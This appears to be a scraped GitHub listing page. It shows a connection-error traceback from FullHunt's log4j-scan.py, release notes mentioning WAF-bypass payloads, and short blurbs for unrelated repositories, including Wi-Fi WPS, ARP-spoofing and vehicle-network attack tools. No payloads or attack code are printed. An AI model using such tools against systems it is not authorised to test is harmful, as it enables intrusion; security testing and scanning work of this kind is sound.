    Traceback (most recent call last): File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 400, in increment raise six.reraise(type(error), error, _stacktrace) File "/usr/lib/python3/dist-packages/six.py", line 702, in reraise raise value.with_traceback(tb) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 376, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 996, in validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 366, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl.py", line 370, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.8/ssl.py", line 500, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.8/ssl.py", line 1040, in _create self.do_handshake() File "/usr/lib/python3.8/ssl.py", line 1309, in do_handshake self._sslobj.do_handshake() urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "log4j-scan.py", line 412, in main() File "log4j-scan.py", line 382, in main dns_callback = Interactsh() File "log4j-scan.py", line 239, in init self.register() File "log4j-scan.py", line 247, in register res = self.session.post( File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 578, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 530, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 643, in send r = adapter.send(request, **kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 498, in send raise ConnectionError(err, request=request) requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    opened by GiuBravo 1
Releases(v.1.1.0)
  • v.1.1.0(Oct 20, 2022)

  • v1.0.1(Dec 25, 2021)

    • [x] Added additional 15 community-provided WAF bypass payloads (Total payloads: 23 payloads).
    • [x] Added additional common default POST parameters.
    • [x] Added --custom-waf-bypass-payload to add user-defined custom WAF bypass payload.
    • [x] Fixed a minor exception when "Referer" is not set on the headers-file list.
    • [x] Typo and PEP8 related clean-ups.
    Source code(tar.gz)
    Source code(zip)
  • v1.0.0(Dec 25, 2021)

Owner
FullHunt
Expose Your Attack Surface
FullHunt
A pure-Python KSUID implementation

Svix - Webhooks as a service Svix-KSUID This library is inspired by Segment's KSUID implementation: https://github.com/segmentio/ksuid What is a ksuid

Svix 83 Dec 16, 2022
euserv auto-renew script - A Python script which can help you renew your free EUserv IPv6 VPS.

eu_ex eu_ex means EUserv_extend. A Python script which can help you renew your free EUserv IPv6 VPS. This Script can check the VPS amount in your acco

A beam of light 92 Jan 25, 2022
Simple self-hosted server to receive files from remote systems

Badtray This is a very simple self-hosted server to receive files from remote systems. This works similar to Bintray (RIP) and primarily designed to d

Alex Taradov 1 Nov 22, 2021
This is a simple python code to get the list of banned IP addresses from Fail2ban

Fail2ban Scripts Usage banned_list.py This script tries to get the banned list of IP addresses by Fail2ban for the service freeswitch. You can modify

Yehor Smoliakov 9 Dec 28, 2022
TsuserverMoS - A Python-based server for Attorney Online,

tsuserverMoS A Python-based server for Attorney Online, forked from RealKaiser/tsuserverCC Requires Python 3.7+ and PyYAML. Changes/additions from tsu

1 Dec 30, 2021
Tsunami-Fi is simple multi-tool bash application for Wi-Fi attacks

🪴 Tsunami-Fi 🪴 Русская версия README 🌿 Description 🌿 Tsunami-Fi is simple multi-tool bash application for Wi-Fi WPS PixieDust and NullPIN attack,

【Kiko】 35 Dec 09, 2022
Free,Cross-platform,Single-file mass network protocol server simulator

FaPro Free,Cross-platform,Single-file mass network protocol server simulator 中文Readme Description FaPro is a Fake Protocol Server tool, Can easily sta

FOFA Pro 1.4k Jan 06, 2023
A Python package for handling free proxies from sslproxies.org

SSLProxies Get free working proxy from https://www.sslproxies.org/ and use it in your script This is a port/rewrite of free-proxy with additional feat

Nate Harris 2 Mar 17, 2022
A Python based command line ARP Spoofer utility, which takes input as arguments for the exact target IP and gateway IP for which you wish to Spoof ARP request

A Python based command line ARP Spoofer utility, which takes input as arguments for the exact target IP and gateway IP for which you wish to Spoof ARP request

Abhinandan Khurana 1 Feb 10, 2022
ANalyse is a vehicle network analysis and attack tool.

CANalyse is a tool built to analyze the log files to find out unique datasets automatically and able to connect to simple user interfaces suc

0xh3nry 87 Dec 18, 2022
Autopen is a very modular tool that automates the execution of scans during a penetration test.

Autopen Autopen is a very modular tool that automates the execution of scans during a penetration test. A Nmap scan result in the form of an XML file

2 Dec 22, 2021
Light, simple RPC framework for Python

Agileutil是一个Python3 RPC框架。基于微服务架构,封装了rpc/http/orm/log等常用组件,提供了简洁的API,开发者可以很快上手,快速进行业务开发。

16 Nov 22, 2022
HTTP proxy pool server primarily meant for evading IP whitelists

proxy-forwarder HTTP proxy pool server primarily meant for evading IP whitelists. Setup Create a file named proxies.txt and fill it with your HTTP pro

h0nda 2 Feb 19, 2022
ASC - Api Server Controller

ASC - Api Server Controller

Uriel Alves 1 Jan 03, 2022
Remote vanilla PDB (over TCP sockets) done right: no extras, proper handling around connection failures and CI.

Overview docs tests package Remote vanilla PDB (over TCP sockets) done right: no extras, proper handling around connection failures and CI. Based on p

Ionel Cristian Mărieș 227 Dec 27, 2022
A simple hosts picker for Microsoft Services

A simple Python scrip for you to select the fastest IP for Microsoft services.

Konnyaku 394 Dec 17, 2022
Uses machine learning to scan the similarity of two texts

PlagiarismChecker Uses machine learning to scan the similarity of two documents. End Points: http://localhost:3000/register (create a/c) http://localh

Elvis Chege 2 Aug 10, 2022
A simple Tor switcher script switches tor nodes in interval of time

Tor_Switcher A simple Tor switcher script switches tor nodes in interval of time This script will switch tor nodes in every interval of time that you

d4rk sh4d0w 2 Nov 15, 2021
Tool to get the top 100 of the fastest nodes in the Tor network. Based on Kirzahk tool.

Tor Network Top 100 IPs Tool to get the top 100 of the fastest nodes in the Tor network. Based on Kirzahk tool. Just execute top100ipstor.py to get th

Juan Manuel 0 Jan 23, 2022
A Python Packages to make own chat room

Chathon A Python packages for make own chat room Install PyPI pip install chathon

1 Dec 10, 2021